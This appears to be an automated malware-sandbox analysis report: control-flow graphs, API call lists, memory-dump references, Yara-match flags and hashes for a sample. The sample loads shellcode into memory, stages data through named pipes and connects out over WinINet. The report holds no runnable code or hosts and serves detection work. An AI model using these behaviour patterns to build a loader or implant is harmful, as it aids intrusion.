                            • Opcode Fuzzy Hash: 85e1cf29ecf6396504c26cb88095de616834151ce1f924ca111f46e639445432
                            • Instruction Fuzzy Hash: 7F4107B4A043058FDB10DF69E98471EBBE0BB48705F14453EE988A73A2D778D845CB99

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 304 401160-40118a 306 401430-40143c GetStartupInfoA 304->306 307 401190-4011a1 304->307 308 4011bc-4011c8 307->308 309 4011a8-4011aa 308->309 310 4011ca-4011d4 308->310 313 4011b0-4011b9 Sleep 309->313 314 4013c8-4013d5 309->314 311 4011da-4011e1 310->311 312 4013db-4013ef _amsg_exit 310->312 317 401460-401479 _initterm 311->317 318 4011e7-4011f9 311->318 315 4013f5-401415 _initterm 312->315 316 4011ff-401201 312->316 313->308 314->311 314->312 319 401207-40120e 315->319 320 40141b-401421 315->320 316->319 316->320 321 401483 317->321 318->315 318->316 322 401210-401229 319->322 323 40122c-40126c call 401e20 SetUnhandledExceptionFilter call 4029d0 call 401c70 __p__acmdln 319->323 320->319 325 40148b-40149a exit 321->325 322->323 332 401281-401287 323->332 333 40126e 323->333 335 401270-401272 332->335 336 401289-401294 332->336 334 4012bd-4012c5 333->334 337 4012c7-4012d0 334->337 338 4012db-4012fb malloc 334->338 339 401274-401277 335->339 340 4012b8 335->340 341 40127e 336->341 342 4012d6 337->342 343 4013b8-4013bc 337->343 338->321 344 401301-40130d 338->344 345 4012a0-4012a2 339->345 346 401279 339->346 340->334 341->332 342->338 343->342 347 401310-401344 strlen malloc memcpy 344->347 345->340 348 4012a4 345->348 346->341 347->347 349 401346-401393 call 401960 call 4029e0 347->349 350 4012a8-4012b1 348->350 349->325 356 401399-4013a1 349->356 350->340 352 4012b3-4012b6 350->352 352->340 352->350 357 4013a7-4013b2 356->357 358 401448-40145d _cexit 356->358
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
                            • String ID:
                            • API String ID: 1672962128-0
                            • Opcode ID: 8f109d0c8fcfb376cf6425773cd7d35a5131f80409148732b39be14af764f308
                            • Instruction ID: 14d090d825811c9464361f5f824c2d109dd69b69c83bbf3de982eb4becc4467a
                            • Opcode Fuzzy Hash: 8f109d0c8fcfb376cf6425773cd7d35a5131f80409148732b39be14af764f308
                            • Instruction Fuzzy Hash: ED5168B5A043058FDB10DFA9E984B1ABBE0FB48705F10453EE944AB3A2D778D845CB99

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 359 dbef82-dbefa9 CryptAcquireContextA 360 dbefab-dbefbc CryptAcquireContextA 359->360 361 dbefc2-dbefd5 CryptGenRandom 359->361 360->361 362 dbefbe-dbefc1 360->362 363 dbefd7-dbefe4 CryptReleaseContext 361->363 364 dbefe6-dbefe8 361->364 363->362 364->363
                            APIs
                            • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000020,00000000,00000000,?,?,00DBEFF8,?,00DB8090,?,00DB8090,?), ref: 00DBEFA5
                            • CryptAcquireContextA.ADVAPI32(00000000,00000000,Microsoft Base Cryptographic Provider v1.0,00000001,F0000028,?,?,00DBEFF8,?,00DB8090,?,00DB8090,?), ref: 00DBEFB8
                            • CryptGenRandom.ADVAPI32(00000000,00DB8090,?,?,?,00DBEFF8,?,00DB8090,?,00DB8090,?), ref: 00DBEFCC
                            • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,00DBEFF8,?,00DB8090,?,00DB8090,?), ref: 00DBEFDC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$Context$Acquire$RandomRelease
                            • String ID: Microsoft Base Cryptographic Provider v1.0
                            • API String ID: 685801729-291530887
                            • Opcode ID: c824a87fc7bcef90be91e0c10a0595d917fa9b64215f6cb250d63412a41fde4d
                            • Instruction ID: 9ce8746fe4fd27adf1750e7c226bee9a776fa879ce86400dd87352f20aeafa19
                            • Opcode Fuzzy Hash: c824a87fc7bcef90be91e0c10a0595d917fa9b64215f6cb250d63412a41fde4d
                            • Instruction Fuzzy Hash: A9F08136A45218F7DF214695CC09FEF7B6CDB49764F214052FA01E7280D770EA00A6B4

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 540 40161c-401680 CreateNamedPipeA 541 401682-401697 ConnectNamedPipe 540->541 542 4016d9-4016e0 540->542 541->542 543 401699-40169b 541->543 544 4016c4-4016ce CloseHandle 543->544 545 40169d-4016c2 WriteFile 543->545 544->542 545->544 546 4016d0-4016d7 545->546 546->543
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: NamedPipe$CloseConnectCreateFileHandleWrite
                            • String ID:
                            • API String ID: 2239253087-0
                            • Opcode ID: 588faa4c15bb17f6641a11f41d94c7d67e31f3f64e51a70bffe85c2206670ea5
                            • Instruction ID: 647ba10e4562674360e559436f846850fae7207d816ad69ae546ddef800915d1
                            • Opcode Fuzzy Hash: 588faa4c15bb17f6641a11f41d94c7d67e31f3f64e51a70bffe85c2206670ea5
                            • Instruction Fuzzy Hash: C1114CB0804305AFD7109F66C84836FBBF8EB84359F00892EE895973A1D37AC4488F96

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 53 401805-4018b9 GetTickCount sprintf CreateThread
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: CountCreateThreadTicksprintf
                            • String ID: .$\$\$\$\$e$i$p$p
                            • API String ID: 1367138260-609229641
                            • Opcode ID: 6993ad00b22fa5709ddfae83127fd071b9715a62268548fc0a47211300f561df
                            • Instruction ID: 85e9528532d9762a1f7b070758f0f1347f94744085bed28000c50463c0499d60
                            • Opcode Fuzzy Hash: 6993ad00b22fa5709ddfae83127fd071b9715a62268548fc0a47211300f561df
                            • Instruction Fuzzy Hash: E50160B4408701DFE3009F16D55C31BBEE1AB84749F00891DE5991A2A1C7BE864CCF9A

                            Control-flow Graph

                            APIs
                            • GetACP.KERNEL32(00000000,00000000,00000080,?,?,?,?,?,?,?,?,00DB14C0,00000000,00000000), ref: 00DB8069
                            • GetOEMCP.KERNEL32(?,?,?,?,?,?,?,?,00DB14C0,00000000,00000000), ref: 00DB8075
                            • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00DB14C0,00000000), ref: 00DB80A2
                            • GetTickCount.KERNEL32 ref: 00DB80A6
                              • Part of subcall function 00DC8C0A: __getptd.LIBCMT ref: 00DC8C0F
                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00DB14C0,00000000), ref: 00DB80D3
                            • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00DB14C0,00000000), ref: 00DB8139
                            • _memset.LIBCMT ref: 00DB8170
                            • _memset.LIBCMT ref: 00DB81AF
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$_memset$CountTick__getptd
                            • String ID:
                            • API String ID: 3908538216-0
                            • Opcode ID: d06c872a493a1bbc6f599a6ea7021751f94745041d3f1e6cede3c86d3d1ba40e
                            • Instruction ID: b632cb67fe1df459fcf343a40658facea095608a3b5f37190c61c92322d5459f
                            • Opcode Fuzzy Hash: d06c872a493a1bbc6f599a6ea7021751f94745041d3f1e6cede3c86d3d1ba40e
                            • Instruction Fuzzy Hash: A4319373900208FADB11BBB1AC46EEE7FA8DF08364F14405AF906E7292DE75CA449670
                            APIs
                            • InternetOpenA.WININET(00DB1572,00000003,00000000,00000000,00000000), ref: 00DB27C2
                            • InternetSetOptionA.WININET(00000005,0003A980,00000004), ref: 00DB27E1
                            • InternetSetOptionA.WININET(00000006,0003A980,00000004), ref: 00DB27F1
                            • InternetConnectA.WININET(?,?,00000000,00000000,00000003,00000000,00DEFFC4), ref: 00DB2809
                            • InternetSetOptionA.WININET(00000000,0000002B,00000000,00000000), ref: 00DB283A
                            • InternetSetOptionA.WININET(0000002C,00000000,00000000), ref: 00DB2856
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$Option$ConnectOpen
                            • String ID:
                            • API String ID: 230958251-0
                            • Opcode ID: 914df7411ac79997f32733a4b41e1db7f444c1ff1bc1f583dbab305b7250317f
                            • Instruction ID: 5e353c7e07c26f5a540faeb86b22f755710cfb2533c092586ffec43f39df2e5b
                            • Opcode Fuzzy Hash: 914df7411ac79997f32733a4b41e1db7f444c1ff1bc1f583dbab305b7250317f
                            • Instruction Fuzzy Hash: 9831C272590384FAEA313B61AC4AFFB3F29EB81B14F10502AF602DD1D1DE758A45C678

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 365 db131c-db1427 call db81bc call db8382 * 3 call dbc2f3 call dbc2dd call dbc2e8 call dbc2f3 * 2 call dc87ff call dbc2e8 * 3 call dbc2dd call dbcb1c call db5c3e call dbea37 * 2 call db386e 404 db1429 call dbde47 365->404 405 db142e-db1441 call dbc2e8 call db38b1 365->405 404->405 411 db1448-db144f call db38cc 405->411 412 db1443 call dbde47 405->412 416 db1451 call dbde47 411->416 417 db1456-db145d call db3927 411->417 412->411 416->417 421 db145f call dbde47 417->421 422 db1464-db1494 call dbc2dd call dbc2e8 call dc87ff 417->422 421->422 430 db149b-db14c6 call dbc2e8 call dbea37 call dbc2e8 call db8060 422->430 431 db1496 call dbde47 422->431 441 db14c7-db14c8 430->441 431->430 442 db14ce-db153e call dbcdfa call dc8956 call dbcdfa call dc8956 * 2 call db5c6a 441->442 443 db16ac-db16ca call dbcea0 call dc8722 call dbde47 441->443 462 db155f-db1592 call db273c call dbc2e8 call db2e3d 442->462 463 db1540-db1545 442->463 475 db15bd-db15c0 462->475 476 db1594-db15a2 call dbbcc5 462->476 465 db1548-db154d 463->465 465->465 467 db154f-db1551 465->467 467->462 468 db1553-db155e call db6072 467->468 468->462 477 db1628 475->477 478 db15c2-db15d1 call db8fa1 call dbc2e8 475->478 484 db15b2-db15b5 476->484 485 db15a4-db15b0 call dba36c 476->485 482 db1630-db163c call db2874 call db386e 477->482 494 db15da 478->494 495 db15d3-db15d8 478->495 496 db163e call dbde47 482->496 497 db1643-db1657 call dbce28 482->497 484->475 485->475 498 db15df-db15f6 call db4f55 call db7853 call db7017 call db386e 494->498 495->498 496->497 504 db1659 call dbde47 497->504 505 db165e-db1666 497->505 524 db15f8 call db2fb7 498->524 525 db15fd-db1604 498->525 504->505 505->443 508 db1668-db166f 505->508 510 db169a-db169b call db54a0 508->510 511 db1671-db167f 508->511 519 db16a0-db16a7 510->519 514 db1692 511->514 515 db1681-db1690 call db300f 511->515 517 db1694-db1696 514->517 515->517 517->510 521 db1698 517->521 519->441 521->510 524->525 525->482 527 db1606-db1626 call db2874 call db273c call db2962 525->527 527->482
                            APIs
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                            • _malloc.LIBCMT ref: 00DB13B2
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                              • Part of subcall function 00DBCB1C: __time64.LIBCMT ref: 00DBCB28
                              • Part of subcall function 00DBCB1C: _malloc.LIBCMT ref: 00DBCB71
                              • Part of subcall function 00DBCB1C: _memset.LIBCMT ref: 00DBCB8F
                              • Part of subcall function 00DBCB1C: _strtok.LIBCMT ref: 00DBCBB4
                              • Part of subcall function 00DBCB1C: _strtok.LIBCMT ref: 00DBCBE6
                              • Part of subcall function 00DB5C3E: __time64.LIBCMT ref: 00DB5C4B
                              • Part of subcall function 00DBEA37: _malloc.LIBCMT ref: 00DBEA5E
                              • Part of subcall function 00DBEA37: _memset.LIBCMT ref: 00DBEA8C
                              • Part of subcall function 00DBEA37: _realloc.LIBCMT ref: 00DBEA6D
                            • _malloc.LIBCMT ref: 00DB1486
                            • __snprintf.LIBCMT ref: 00DB14E8
                            • __snprintf.LIBCMT ref: 00DB1507
                            • __snprintf.LIBCMT ref: 00DB1525
                              • Part of subcall function 00DBDE47: Sleep.KERNEL32(000003E8,00000000,00000000,00000080,00DB16C4), ref: 00DBDE84
                              • Part of subcall function 00DBDE47: ExitThread.KERNEL32 ref: 00DBDE8E
                              • Part of subcall function 00DB273C: InternetOpenA.WININET(00DB1572,00000003,00000000,00000000,00000000), ref: 00DB27C2
                              • Part of subcall function 00DB273C: InternetSetOptionA.WININET(00000005,0003A980,00000004), ref: 00DB27E1
                              • Part of subcall function 00DB273C: InternetSetOptionA.WININET(00000006,0003A980,00000004), ref: 00DB27F1
                              • Part of subcall function 00DB273C: InternetConnectA.WININET(?,?,00000000,00000000,00000003,00000000,00DEFFC4), ref: 00DB2809
                              • Part of subcall function 00DB273C: InternetSetOptionA.WININET(00000000,0000002B,00000000,00000000), ref: 00DB283A
                              • Part of subcall function 00DB273C: InternetSetOptionA.WININET(0000002C,00000000,00000000), ref: 00DB2856
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet_malloc$Option$__snprintf$__time64_memset_strtok$AllocateConnectExitHeapOpenSleepThread_realloc
                            • String ID:
                            • API String ID: 3506699640-0
                            • Opcode ID: 4f1505f5c13b54573ad0c605ce982d1566c7931be01a99d8a4d9f60f99c0f9bd
                            • Instruction ID: 2900882603d310469d0f331e603811e01a76a3789d9b1a831688a1f04d05f448
                            • Opcode Fuzzy Hash: 4f1505f5c13b54573ad0c605ce982d1566c7931be01a99d8a4d9f60f99c0f9bd
                            • Instruction Fuzzy Hash: 08911472904301EBD6207B759C03FEF77E5EF84760F580919F586AA1D2EE71C9009AB6

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 365 db131c-db1427 call db81bc call db8382 * 3 call dbc2f3 call dbc2dd call dbc2e8 call dbc2f3 * 2 call dc87ff call dbc2e8 * 3 call dbc2dd call dbcb1c call db5c3e call dbea37 * 2 call db386e 404 db1429 call dbde47 365->404 405 db142e-db1441 call dbc2e8 call db38b1 365->405 404->405 411 db1448-db144f call db38cc 405->411 412 db1443 call dbde47 405->412 416 db1451 call dbde47 411->416 417 db1456-db145d call db3927 411->417 412->411 416->417 421 db145f call dbde47 417->421 422 db1464-db1494 call dbc2dd call dbc2e8 call dc87ff 417->422 421->422 430 db149b-db14c6 call dbc2e8 call dbea37 call dbc2e8 call db8060 422->430 431 db1496 call dbde47 422->431 441 db14c7-db14c8 430->441 431->430 442 db14ce-db153e call dbcdfa call dc8956 call dbcdfa call dc8956 * 2 call db5c6a 441->442 443 db16ac-db16ca call dbcea0 call dc8722 call dbde47 441->443 462 db155f-db1592 call db273c call dbc2e8 call db2e3d 442->462 463 db1540-db1545 442->463 475 db15bd-db15c0 462->475 476 db1594-db15a2 call dbbcc5 462->476 465 db1548-db154d 463->465 465->465 467 db154f-db1551 465->467 467->462 468 db1553-db155e call db6072 467->468 468->462 477 db1628 475->477 478 db15c2-db15d1 call db8fa1 call dbc2e8 475->478 484 db15b2-db15b5 476->484 485 db15a4-db15b0 call dba36c 476->485 482 db1630-db163c call db2874 call db386e 477->482 494 db15da 478->494 495 db15d3-db15d8 478->495 496 db163e call dbde47 482->496 497 db1643-db1657 call dbce28 482->497 484->475 485->475 498 db15df-db15f6 call db4f55 call db7853 call db7017 call db386e 494->498 495->498 496->497 504 db1659 call dbde47 497->504 505 db165e-db1666 497->505 524 db15f8 call db2fb7 498->524 525 db15fd-db1604 498->525 504->505 505->443 508 db1668-db166f 505->508 510 db169a-db169b call db54a0 508->510 511 db1671-db167f 508->511 519 db16a0-db16a7 510->519 514 db1692 511->514 515 db1681-db1690 call db300f 511->515 517 db1694-db1696 514->517 515->517 517->510 521 db1698 517->521 519->441 521->510 524->525 525->482 527 db1606-db1626 call db2874 call db273c call db2962 525->527 527->482
                            APIs
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                            • _malloc.LIBCMT ref: 00DB13B2
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00DEFFA0,?,00DB106E,00004008,?,?,?,?,00000003,?,70207369), ref: 00DC8876
                              • Part of subcall function 00DBCB1C: __time64.LIBCMT ref: 00DBCB28
                              • Part of subcall function 00DBCB1C: _malloc.LIBCMT ref: 00DBCB71
                              • Part of subcall function 00DBCB1C: _memset.LIBCMT ref: 00DBCB8F
                              • Part of subcall function 00DBCB1C: _strtok.LIBCMT ref: 00DBCBB4
                              • Part of subcall function 00DBCB1C: _strtok.LIBCMT ref: 00DBCBE6
                              • Part of subcall function 00DBEA37: _malloc.LIBCMT ref: 00DBEA5E
                              • Part of subcall function 00DBEA37: _memset.LIBCMT ref: 00DBEA8C
                              • Part of subcall function 00DBEA37: _realloc.LIBCMT ref: 00DBEA6D
                            • _malloc.LIBCMT ref: 00DB1486
                            • __snprintf.LIBCMT ref: 00DB14E8
                            • __snprintf.LIBCMT ref: 00DB1507
                            • __snprintf.LIBCMT ref: 00DB1525
                              • Part of subcall function 00DBDE47: Sleep.KERNEL32(000003E8,00000000,00000000,00000080,00DB16C4), ref: 00DBDE84
                              • Part of subcall function 00DBDE47: RtlExitUserThread.NTDLL(00000000,00000000,00000000,00000080,00DB16C4), ref: 00DBDE8E
                              • Part of subcall function 00DBDE47: WaitForSingleObject.KERNEL32(00000000,00000000,00000080,00DB16C4), ref: 00DBDEAF
                              • Part of subcall function 00DB273C: InternetOpenA.WININET(00DB1572,00000003,00000000,00000000,00000000), ref: 00DB27C2
                              • Part of subcall function 00DB273C: InternetConnectA.WININET(?,?,00000000,00000000,00000003,00000000,00DEFFC4), ref: 00DB2809
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc$__snprintf$Internet_memset_strtok$AllocateConnectExitHeapObjectOpenSingleSleepThreadUserWait__time64_realloc
                            • String ID:
                            • API String ID: 431395496-0
                            • Opcode ID: 785c1a1f2b65c52826bdb9a5481cb86a1e9d5777b189bfa056c66138993a9795
                            • Instruction ID: 2900882603d310469d0f331e603811e01a76a3789d9b1a831688a1f04d05f448
                            • Opcode Fuzzy Hash: 785c1a1f2b65c52826bdb9a5481cb86a1e9d5777b189bfa056c66138993a9795
                            • Instruction Fuzzy Hash: 08911472904301EBD6207B759C03FEF77E5EF84760F580919F586AA1D2EE71C9009AB6

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 534 40156c-40159d VirtualAlloc 535 40159f-4015a1 534->535 536 4015a3-4015b8 535->536 537 4015ba-40161b call 401539 VirtualProtect CreateThread 535->537 536->535
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: Virtual$AllocCreateProtectThread
                            • String ID:
                            • API String ID: 3039780055-3916222277
                            • Opcode ID: 7116a479f18e8398ab62b384885a83961a77cbf5e6f43067b0417bc4564eeb7b
                            • Instruction ID: e62f9da5006a8b60ac6d7aa8aa559fb842e3793d0c2f75f38c45ec490f2c7fc1
                            • Opcode Fuzzy Hash: 7116a479f18e8398ab62b384885a83961a77cbf5e6f43067b0417bc4564eeb7b
                            • Instruction Fuzzy Hash: FD1148B0408304AFD700AF25C48835EBFF4EB88358F40C86EE9998B391D37984098B92

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 583 401296-4012a2 585 4012a4 583->585 586 4012b8-4012c5 583->586 588 4012a8-4012b1 585->588 589 4012c7-4012d0 586->589 590 4012db-4012fb malloc 586->590 588->586 591 4012b3-4012b6 588->591 592 4012d6 589->592 593 4013b8-4013bc 589->593 594 401301-40130d 590->594 595 401483 590->595 591->586 591->588 592->590 593->592 596 401310-401344 strlen malloc memcpy 594->596 597 40148b-40149a exit 595->597 596->596 598 401346-401393 call 401960 call 4029e0 596->598 598->597 603 401399-4013a1 598->603 604 4013a7-4013b2 603->604 605 401448-40145d _cexit 603->605
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: malloc$memcpystrlen
                            • String ID:
                            • API String ID: 3553820921-0
                            • Opcode ID: 948a088ca798df2e7dce449238bcaf35f26902c4bc7ea522de66c663b67a1438
                            • Instruction ID: 2b272e4b46966ba8deed0fafeb192a19a89914a185c4b83b395d914033f718ae
                            • Opcode Fuzzy Hash: 948a088ca798df2e7dce449238bcaf35f26902c4bc7ea522de66c663b67a1438
                            • Instruction Fuzzy Hash: CB3136B9A003058FCB10DF65E98075ABBF1FB44705F14853ED988A73A2E778E945CB89

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 606 4013b3-4013bc malloc 610 401301-40130d 606->610 611 401483 606->611 612 401310-401344 strlen malloc memcpy 610->612 613 40148b-40149a exit 611->613 612->612 614 401346-401393 call 401960 call 4029e0 612->614 614->613 619 401399-4013a1 614->619 620 4013a7-4013b2 619->620 621 401448-40145d _cexit 619->621
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124711597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.4124700446.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124722740.0000000000403000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124733573.0000000000404000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124757842.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.4124769608.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_12.jbxd
                            Similarity
                            • API ID: malloc$memcpystrlen
                            • String ID:
                            • API String ID: 3553820921-0
                            • Opcode ID: f5e0c9adc78a94dab72ef4a8ccb92d4597cac7524235f195ea0d1421677b0eb4
                            • Instruction ID: 9b3cccf6e9dd94e7ac684493c2e87501ce7787e5f0140ca7f17ca5cac32b3744
                            • Opcode Fuzzy Hash: f5e0c9adc78a94dab72ef4a8ccb92d4597cac7524235f195ea0d1421677b0eb4
                            • Instruction Fuzzy Hash: EF2112B8A003058FCB10DF69E880659BBF0FB48705F10843ED988A73A2E774A945CB89
                            APIs
                              • Part of subcall function 00DB2E6E: WSAStartup.WS2_32(00000202,?), ref: 00DB2E8F
                              • Part of subcall function 00DB2E6E: WSACleanup.WS2_32 ref: 00DB2E99
                            • WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 00DB2F3F
                            • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,?,00000000,00000000), ref: 00DB2F6A
                            • closesocket.WS2_32(00000000), ref: 00DB2FA9
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CleanupIoctlSocketStartupclosesocket
                            • String ID:
                            • API String ID: 1100289767-0
                            • Opcode ID: 25a1cade9d9a1ec90bc3a16f961ffc886d68abec4331356a4ef07da50ac2384b
                            • Instruction ID: 5537fc31ffa5fbb0ac09be44264f8c8655e5644c8ff41f871c4d478a3134d972
                            • Opcode Fuzzy Hash: 25a1cade9d9a1ec90bc3a16f961ffc886d68abec4331356a4ef07da50ac2384b
                            • Instruction Fuzzy Hash: 37119472601218FBD7208A669C49EFF7F7DDF89760F148026F90AD6180D670884186B0
                            APIs
                              • Part of subcall function 00DB2E6E: WSAStartup.WS2_32(00000202,?), ref: 00DB2E8F
                              • Part of subcall function 00DB2E6E: WSACleanup.WS2_32 ref: 00DB2E99
                            • WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 00DB2F3F
                            • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,00000001,00000000,00000000), ref: 00DB2F6A
                            • closesocket.WS2_32(00000000), ref: 00DB2FA9
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CleanupIoctlSocketStartupclosesocket
                            • String ID:
                            • API String ID: 1100289767-0
